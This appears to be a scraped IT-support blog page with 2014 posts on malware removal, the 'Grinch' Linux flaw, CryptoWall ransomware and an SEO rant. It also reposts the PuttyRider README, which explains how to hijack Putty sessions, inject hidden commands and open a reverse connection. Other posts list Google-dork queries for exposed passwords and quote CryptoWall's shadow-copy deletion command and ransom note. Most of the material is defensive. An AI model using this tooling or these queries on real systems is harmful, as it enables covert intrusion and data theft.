Wednesday, December 31, 2014

Powershell Has Stopped Working & Trojans

Powershell Has Stopped Working & Trojans
Ref: https://forums.malwarebytes.org/index.php?/topic/159960-powershell-has-stopped-working-trojans/



      
Please run a Threat Scan with Malwarebytes

Start Malwarebytes 2.0..........
Click on Settings > Detection and Protection > Non-Malware Protection > PUP (Potentially Unwanted Program) detections > Make sure it's set to Treat detections as malware
Same for PUM (Potentially Unwanted Modifications)
Quarantine all that's found
Post the log (
save the log as a .txt file not .xml)


Then......



Please download and run RogueKiller 32 bit to your desktop.

RogueKiller<---use class="apple-converted-space" for="" one="" span="" this=""> 64 bit systems




    Which system am I using?

Quit all running programs.

For Windows XP, double-click to start.
For Vista or Windows 7-8, do a right-click on the program, select Run as Administrator to start, & when prompted Allow to run.


Wait for the Prescan to finish

Click Scan to scan the system.


Don't run any other options, they're not all bad!!!!!!!

RogueKiller logs will also be located here:
%programdata%/RogueKiller/Logs <-------w7 span="">
C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <-------xp o:p="">
________________________________________________________________________________




Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait


The tool will create a log (Fixlog.txt) in the folder, please post it to your reply. 







Then...........



Please download and run ComboFix.

The most important things to remember when running it is to disable all your malware programs and run Combofix from your desktop.









Please visit this webpage for download links, and instructions for running ComboFix

http://www.bleepingc...to-use-combofix

http://www.bleepingc...combofix/dl/12/ 



Please make sure you click download buttons that look similar to this, not "sponsored ad links":





Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Information on disabling your malware programs can be found Here.

Make sure you run ComboFix from your desktop.

Give it at least 30-45 minutes to finish if needed.

Please include the C:\ComboFix.txt in your next reply for further review.


----------NOTE<---------- font="" nbsp="">
If you get the message Illegal operation attempted on registry key that has been marked for deletion after you run ComboFix....please reboot the computer, this should resolve the problem. You may have to do this several times if needed.

________________________________________________________________________________
Lets check your computers security before you go and we have a little cleanup to do also:

 Download Security Check by screen317 from HERE or HERE.


     ·         
          Save it to your Desktop.
·         Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
·         If you get Unsupported operating system. Aborting now, just reboot and try again.

·         A Notepad document should open automatically called checkup.txt.


_______________________________________________________________________________
A little clean up to do....

Please Uninstall ComboFix: (------->if you used it<------- span="">)

Press the Windows logo key + R to bring up the "run box"

Copy and paste next command in the field:

ComboFix /uninstall

Make sure there's a space between Combofix and /















Then hit enter. (it may look like CF is re-installing but it's not)
This will uninstall Combofix, delete its related folders and files, hide file extensions, hide the system/hidden files and clears System Restore cache and create new Restore point

(If that doesn't work.....you can simply rename ComboFix.exe to Uninstall.exe and double click it to complete the uninstall or download and run the uninstaller)

---------------------------------




Download Delfix from here and save it to your desktop. (you may already have this)

·         Ensure Remove disinfection tools is checked.
·         Click the Run button.
·         Reboot
Any other programs or logs that are still remaining, you can manually delete. (right click.....Delete)
IE: RogueKiller.exe, RKreport.txt, RK_Quarantine folder, C:\FRST folder, FRST-OlderVersion folder, MBAR folder, etc....AdwCleaner > just run the program and click uninstall.

Note:
If you used FRST and can't delete the quarantine folder:
Download the fixlist.txt to the same folder as FRST.exe.
Run FRST.exe and click Fix only once and wait
That will delete the quarantine folder created by FRST.
The rest you can manually delete.




CMI Limited - Remove this Junk

Well last day of the year and out with a bang, saw a system with a ton of rogue applications installed, one being:

Tuesday, December 30, 2014

Fix Winsock

Winsock Fix for Windows Computers

After removing spyware or malware, if you have problems connecting to the Internet, you may need to initialize your TCP/IP network settings. To restore your connection, follow the directions below for the type of Windows computer you use.

Windows 7 computers

Click Start in the lower-left corner of the screen.
Click in the Start Search box and type the following command:

cmd

When cmd.exe appears in the Programs box, right-click it and select Run as administrator as shown in the following graphic:







































Click Continue if the User Account Control dialog box prompts you whether to run this program.

In the window that appears, type the following command:

netsh winsock reset

The window should look similar to the following:






















Press ENTER.
Restart your computer.

Wednesday, December 17, 2014

The Grinch


















http://www.techworm.net/2014/12/linux-grinch-vulnerability.html#prettyPhoto

All Linux Platforms are vulnerable to the ‘Grinch’ Root Access vulnerability

Security researchers at Alert Logic have unearthed a vulnerability in Linux  platforms that could potentially affect every system even remotely using Linux including Android smartphones and tablets. This vulnerability dubbed “Grinch” could potentially allow a user to get root access of a system thereby bypassing all security mechanisms leaving the target machine utterly defenseless. This flaw can be used across Linux powered computers, servers and even android devices. Alert Logic states,

According to a 2013 report from W3Tech, approximately 65% of all web servers on the Internet utilize a Unix/Linux based operating system. We uncovered a bug that impacts all Linux platforms, including mobile devices, and we’re calling it “grinch.” Fortunately, there are ways to detect the exploit of this bug in your environment until a patch is released.

Exploitation of the logging system

Grinch Root Access Vulnerability Impacts All Linux PlatformsThis isn’t the first major vulnerability to be uncovered in Linux. The same researchers had uncovered vulnerabilities in JournalD back in August, 2014, which allowed attackers to hijack the terminal sessions for remote execute commands. Further digging led them to grinch. The vulnerability was found in a Linux authorization system which could give an unauthorized user root access to the system by leveraging “wheel,” a special user group that controls access to the su command and allows one user to operate as if they were another.  Writing on the Alert Logic blog, Chief Security Evangelist, Stephen Coty stated,

“If we were to compromise the user through a client-side vulnerability or any privilege escalation on the box itself, we would no longer need to worry about cached Sudo authorization timestamp tokens or trying to trick users into providing their credentials with bashrc, environment modifications, or other means,” the researchers explained. “Instead, we can abuse the user’s group privileges to give us access, thus granting direct authentication bypass even if the wheel user cannot get root like in Ubuntu ecosystems.”

A potential hacker could exploit the Grinch flaw by either modifying the registered user accounts in a wheel or by manipulating the Policy Kit (Polkit), a graphical User interface for managing privileged operations for ordinary users.

“Polkit can be used by privileged processes to decide if it should execute privileged operations on behalf of the requesting user. For directly executed tools, Polkit provides a setuid-root helper program called ‘’pkexec.’’ The hooks to ask the user for authorizations are well integrated into text environments and native in all major graphical environments” notes Alert Logic in a blog.”

Whichever method the attacker uses, the goal is to gain root access to the system. With root access, the attacker has full administrative control and can install, modify programs or access files in any directory. The attacker is also able to remotely control the system implying they can create a replicating worm which can be spread to other systems instantaneously.

Threat perception

With an approximate 65% of web servers running on Linux/Unix the threat of this vulnerability cannot be emphasized enough. Major companies which run their services on Linux based system will be affected include the cloud servers of Amazon and Microsoft. Not to mention the half a billion users of Android around the world who stand in risk. “We find that possession of user logs and knowledge of your own environment are the best security content to help you navigate away from a bug like grinch,” the team advised. “Know how your Linux administrator is installing packages and managing updates.”

On the bright side, the researchers also denied any news of this vulnerability ever being used so far. So no major damage has been done. It is advised to restrict user permissions on your Linux systems and also monitor user activity until a proper patch is released.

On the vulnerability level, Grinch could be to Linux what ShellShock is to Windows.  Until and unless a patch is released all the devices running on Linux are vulnerable to Grinch.  Linux team is yet to confirm the Alert Logic’s finding or issue a patch for this vulnerability but Coty believed that Linux was working on this issue.

How Public Is Your Private Information

Thursday, December 11, 2014

PuttyRider


PuttyRider is a tool for performing dll injection of Putty and allows an attacker to inject Linux commands.
REF: https://github.com/seastorm/PuttyRider














PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.

Download
PuttyRider-bin.zip

Documentation
Defcamp 2014 presentation - pdf
Defcamp 2014 presentation - video

Examples:
List existing Putty processes and their status (injected / not injected)

  • PuttyRider.exe -l


Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

  • PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

  • PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

  • PuttyRider.exe -x

Usage:
Operation modes:
    -l      List the running Putty processes and their connections

    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also

    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found

    -x      Cleanup. Remove the DLL from all running Putty instances

    -d      Debug mode. Only works with -p mode

    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD

    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended

    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input

    !discon     Disconnect the main Putty window so it won't display anything
                    This is useful to send commands without the user to notice

    !recon      Reconnect the Putty window to its normal operation mode

    CMD       Linux shell commands

    !exit        Terminate this connection

    !help       Display help for client connection

Compiling:
Use Visual Studio Command Prompt:

  • nmake main dll


Acknowledgements
Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack

Tuesday, December 9, 2014

Turla Epic Snake


Trojan.Turla














Risk Level 1: Very Low
Discovered: January 13, 2014
Updated: August 8, 2014 10:55:40 AM
Type: Trojan

Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Turla is a Trojan horse that may open a back door and steal information on the compromised computer.

Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Payload: Opens a back door.
Releases Confidential Info: Steals information and sends it back to a remote server.
Distribution
Distribution Level: Low

Friday, November 21, 2014

Welcome to the google hacking database


http://www.exploit-db.com/google-dorks/

Welcome to the google hacking database

We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these fools, you've found the center of the Google Hacking Universe!

Search Google Dorks


Latest Google Hacking Entries

Date Title Category
2014-11-19 intext:"Please Authenticate" intitle:Pea... Pages containing login portals
2014-11-18 ext:txt inurl:gov intext:"Content-Type: text/... Files containing juicy info
2014-11-17 ext:msg OR ext:eml site:gov OR site:edu Files containing juicy info
2014-11-03 inurl:CHANGELOG.txt intext:drupal intext:"SA-... Vulnerable Servers
2014-11-03 inurl:robots.txt intext:CHANGELOG.txt intext:disal... Vulnerable Servers
2014-10-21 filetype:log intext:org.apache.hadoop.hdfs Files containing juicy info
2014-10-15 inurl:cgi-bin/mailgraph.cgi Various Online Devices
2014-10-14 inurl:logon.html "CSCOE" Pages containing login portals
2014-10-09 (intext:mail AND intext:samAccountName) AND (filet... Files containing juicy info
2014-10-09 intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AN... Files containing juicy info

Google Hacking Database Categories


Footholds (31)
Examples of queries that can help a hacker gain a foothold into a web server

Files containing usernames (17)
These files contain usernames, but no passwords... Still, google finding usernames on a web site..

Sensitive Directories (74)
Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!

Web Server Detection (72)
These links demonstrate Google's awesome ability to profile web servers..

Vulnerable Files (61)
HUNDREDS of vulnerable files that Google can find on websites...

Vulnerable Servers (80)
These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the "Vulnerable Files" section.

Error Messages (77)
Really retarded error messages that say WAY too much!

Files containing juicy info (312)
No usernames or passwords, but interesting stuff none the less.

Files containing passwords (175)
PASSWORDS, for the LOVE OF GOD!!! Google found PASSWORDS!

Sensitive Online Shopping Info (10)
Examples of queries that can reveal online shopping info like customer data, suppliers, orders, creditcard numbers, credit card info, etc

Network or vulnerability data (63)
These pages contain such things as firewall logs, honeypot logs, network information, IDS logs... all sorts of fun stuff!

Pages containing login portals (289)
These are login pages for various services. Consider them the front door of a website's more sensitive functions.

Various Online Devices (244)
This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.

Advisories and Vulnerabilities (1971)
These searches locate vulnerable servers. These searches are often generated from various security advisory posts, and in many cases are product or version-specific.

Thursday, November 20, 2014

How to test SMTP operations using Telnet














How to test SMTP operations using Telnet

1. Telnet into Exchange server hosting IMS service using TCP port 25.
Command is telnet 25

2. Turn on local echo on your telnet client so that you can see what you are typing.
On Win 9x and NT 3.5/4.0 Telnet client this done by selecting the "preferences" from the "terminal" pull down menu, and checking the local echo radio button.  For Windows 2000 telnet client, issue command "set local_echo", from the telnet command prompt.

3. Issue the following smtp command sequence

helo                
response should be as follows
250 OK

mail from:
response should be as follows
250 OK - mail from

rcpt to:
response should be as follows
250 OK - Recipient

data
response should be as follows
354 Send data.  End with CRLF.CRLF

To:
From:
Subject:
.
response should be as follows
250 OK

quit

Monday, November 17, 2014

Thursday, November 6, 2014

CryptoWall Virus


























So i got the pleasure of meeting this wonderful virus today while at work. I would sat this is one that beat me, i was only able to reformat to remove. i can say i tried everything though, every application from www.Bleepingcomputer.com and most AV scans i could find.

So what is CryptoWall?

CryptoWall is a file-encrypting ransomware program that was released around the end of April 2014 that targets all versions of Windows including Windows XP, Windows Vista, Windows 7, and Windows 8. The media is commonly confusing CryptoWall with the CryptoLocker infection, when it is much more similar to the CryptoDefense ransomware. The most apparent similarity being that CryptoWall's Decryption Service is almost identical to the one for CryptoDefense. In October 2014, the malware developers released a new version of CryptoWall called CryptoWall 2.0.

When you are first infected with CryptoWall it will scan your computer for data files and "encrypt" them using RSA encryption so they are no longer able to be opened. Once the infection has encrypted the files on your computer drives it will open a Notepad window that contains instructions on how to access the CryptoWall Decryption Service where you can pay a ransom to purchase a decryption program. The ransom cost starts at $500 USD and after 7days goes up to $1,000. This ransom must be paid in Bitcoins and sent to a Bitcoin address that changes per infected user.

CryptoWall Ransom Note








































CryptoWall is distributed via emails with ZIP attachments that contain executables that are disguised as PDF files. These PDF files pretend to be invoices, purchase orders, bills, complaints, or other business communications. When you double-click on the fake PDF, it will instead infect your computer with the CryptoWall infection and install malware files either in the %AppData% or %Temp% folders. Once infected the installer will start to scan your computer's drives for data files that it will encrypt. When the infection is scanning your computer it will scan all drive letters on your computer including removable drives, network shares, or even DropBox mappings. In summary, if there is a drive letter on your computer it will be scanned for data files by CryptoWall.

When CryptoWall detects a supported data file it will encrypt it and then add the full path to the file as a value under the HKEY_CURRENT_USER\Software\\CRYPTLIST Registry key. It will also create the DECRYPT_INSTRUCTION.TXT, DECRYPT_INSTRUCTION.URL or INSTALL_TOR.URL if infected with CryptoWall 2.0, and DECRYPT_INSTRUCTION.HTML files in each folder that files were encrypted and in the Windows desktop. The DECRYPT_INSTRUCTION.TXT and DECRYPT_INSTRUCTION.HTML file contain information about what happened to your data and the DECRYPT_INSTRUCTION.URL is a browser shortcut to your assigned decryption page on the infection's decryption service, which is discussed later in this guide.

When the infection has finished scanning your computer it will also delete all of the Shadow Volume Copies that are on the affected computer. It does this because you can potentially use shadow volume copies to restore your encrypted files. The command that is run to clear the Shadow Volumes is:

"C:\Windows\SYsWOW64\cmd.exe" /C "C:\Windows\Sysnative\vssadmin.exe" Delete Shadows /All /Quiet

Now that your computer's data has been fully encrypted, it will display the DECRYPT_INSTRUCTION.TXT and DECRYPT_INSTRUCTION.HTML files that was created on your Desktop. These files contain information about what has happened to your data and instructions on how to pay the ransom. In most cases, once CryptoWall launches this document it will remove the infection files from your computer as they are no longer necessary.


Information about CryptoWall 2.0

In October 2014 the malware developers released CryptoWall 2.0, which resolved some problems in the original version. These changes include developer run Web-to-TOR gateways, unique bitcoin addresses for each victim, and secure deletion of original unencrypted files. These changes are described below:

Unique bitcoin payment addresses - The original CryptoWall utilized the same bitcoin payment address for many of its victims. This allowed people to steal the payment transactions from other victim's payments and use them towards their own ransom payment. By utilizing unique payment addresses for each victim it is no longer possible to steal other people's ransom payments.

Developer run Web-to-TOR gateways - In the past, the CryptoWall developers were utilizing other organization's Web-to-TOR gateways so that victims could access their payment servers that are located on TOR. When these organizations discovered that CryptoWall was utilizing them, they blacklisted the CryptoWall payment servers so that could not be reached. To resolve this, the CryptoWall developers appear to have created their own gateways to TOR. These gateways are currently operating under the following domains: tor4pay.com, pay2tor.com, tor2pay.com, and pay4tor.com.

Secure deletion of original data files - When the CryptoWall originally encrypted a file it would simply delete the original version. This made it sometimes possible to use data recovery tools to restore the original unencrypted files. CryptoWall 2.0 now utilizes a secure deletion method that makes it no longer possible to recover your files via data recovery tools.


Sample of the txt file:

What happened to your files ?
All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 2.0.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.

How did this happen ?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

What do I do ?
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1.https://paytordmbdekmizq.torsona.com/1hoxegs
2.https://paytordmbdekmizq.poltornik.com/1hoxegs
3.https://paytordmbdekmizq.dogotor.com/1hoxegs
4.https://paytordmbdekmizq.torforlove.com/1hoxegs

If for some reasons the addresses are not available, follow these steps:
1.Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2.After a successful installation, run the browser and wait for initialization.
3.Type in the address bar: paytordmbdekmizq.onion/1hoxegs
4.Follow the instructions on the site.


IMPORTANT INFORMATION:
Your personal page: https://paytordmbdekmizq.torsona.com/1hoxegs
Your personal page (using TOR): paytordmbdekmizq.onion/1hoxegs
Your personal identification number (if you open the site (or TOR 's) directly): 1hoxegs

Wednesday, October 29, 2014

Remove Fake Antivirus






One of my favorite tools, works usually well, as well as one could hope. you run this, then scan your pc with AV and boom, Virus Gone!

Monday, October 27, 2014

working guide remove fff5ee.com

I got the fun time of playing with this for 9 hours today, what a big pain in the neck. Really was not a happy day. Also, when you look up how to remove you get to page to use SPYHUNTER. Let me say this SPYHUNTER is total junk, you cannot remove anything without paying, even then you will still not be able to remove the infections. After all that, as if it wasn't bad already, removing requires you to use REVOunistaller because the uninstalled provided nor windows will remove it. JUNK!


shellshock attacks mail server


Thursday, October 23, 2014

Rant: SEO's Biggest waste of money, time and resources a company could spend

I am going to add an article i found below, but I personally wanted to add my distaste for these companies. If you are going to enlist the services of  a SEO you might just go ahead and wipe your ass with that cash. There is nothing that a SEO can do that no semi-tech smart person can do, and if you can search on Google you can defiantly find out how to.

SEO is a complete waste of time
http://performinsider.com/2013/05/seo-is-a-complete-waste-of-time
Written by Pace Lattin
May 9, 2013 # 10:16 am # Marketing Insights, Specials # 42 Comments

There is so much out there about Search Engine Optimization (SEO), including complete publications that just focus on how to optimize, strategize and theorize about SEO.  Entire companies make millions on convincing people that their entire plan should be about SEO so much that they need to hire “experts” to optimize their pages to such a degree that they need to spend more money than they could ever make in return. From reading the publications and expert blogs about SEO, you’d that if you are not thinking about SEO all the time, you are going to completely fail at anything you do online.

Here’s the truth that no one wants to tell you: SEO is complete waste of time.

Many people are going to read what I wrote and proclaim immediately that I am nothing but a total jackass and they are the real expert in SEO and know exactly what is going on.

On a weekly basis I have some “expert” with a blog sending me an email, telling me what I am doing wrong about SEO, and how my publication is completely fucked up from an SEO standpoint, that I am not getting any traffic whatsoever from search engines and they are happy to tell me how I should be running my business.

Here’s a few facts:

1) PerformInsider.com gets almost 1-2k people a day from search engines, mainly google. I have spent almost no time thinking about SEO. We are not even two years old.
2) We get traffic from keywords about SEO, including SEO Tip type articles, and we are not a SEO centric publication
3) Performance Marketing Insider makes more money than almost any publication in the industry based on our traffic and content. We are so successful that are several websites that are completely dedicated to making fun of us this publication.

Here’s probably what you also don’t know about me:
1) I have owned three publications about online advertising in the last 10 years, two of them existing before the word “blog” was even used, and have always been on the top of many search engines without knowing about SEO.
2) I have owned an advertising network that did $100M in revenue in one year. We were in the top 20 comscore networks for several years. We received a great deal of business from search.
3) I have never taken a single SEO class, read a single book about SEO or even gone to a SEO conference. I just have always made good content, done great promotions and focused on business. Yes, I read SEO articles sometimes.

Still, you are probably going to say, “But you need to still be concerned about SEO somewhat, right?” Yes, of course.

I’m not the biggest fan of Jeremy Schoemaker (and I hear he’s not exactly hanging posters of me on his wall) but he knows what he is talking about:

Shoemoney, Jeremy Schoemaker, SEO Sucks

Do basic things to ensure your site is optimized the best, consider the layout, and probably get some good plugins that have great reviews. Still, the focus should be on making great content that drives visitors and makes you money. If you are focusing on SEO from the start instead of creating a real site with real quality content, then you are going to have a sustainable business or site.

The other thing you need to consider is that SEO rules keep on changing. What will show up in search seems to change every day, and those who are making sites specifically for SEO are finding their business models often thrown out the door. However, every business I have made that is content based has survived and made a lot of money no matter what, because what I am doing is focused on content, not on a quick buck.

Even if the rules weren’t changing, what the experts say will work seems to be completely contradictory.

Yes, there are various design things you need to consider, how you link pages – but there are tons of plugins that will do that for you. Even the experts find themselves often being screwed when it comes to SEO because they are..umm.. over-optimizing for SEO. They are so concerned about SEO and how to optimize that they create a site that is only made for SEO and google bitch-slaps them really hard in return.

If you want to know what you really, really need to know about SEO, we actually have an article written by one of the experts. Uh-huh, he has his own publication about search engine marketing and optimization, but without having to hire an expert, read an entire book or attend a webinar, you are going to learn pretty much all you need to know from this one article called 5 SEO Tips You Should Know to Survive in 2013. Really.

Now, go make money, build content and ignore what most the experts are telling you, especially if they want you to buy something, rent something, attend something. Buh-bye.

Take care, and if you disagree, feel free to comment and tell me why.

And by the way, Penn Jillette is one my neighbors and has the craziest-ass house I’ve ever seen.

—-
Get Free Mobile Optimization of your offer

Written by Pace Lattin

Pace Lattin is one of the top experts in interactive advertising, affiliate marketing. Pace Lattin is known for his dedication to ethics in marketing, and focus on compliance and fraud in the industry, and has written numerous articles for publications from MediaPost, ClickZ, ADOTAS and his own blogs.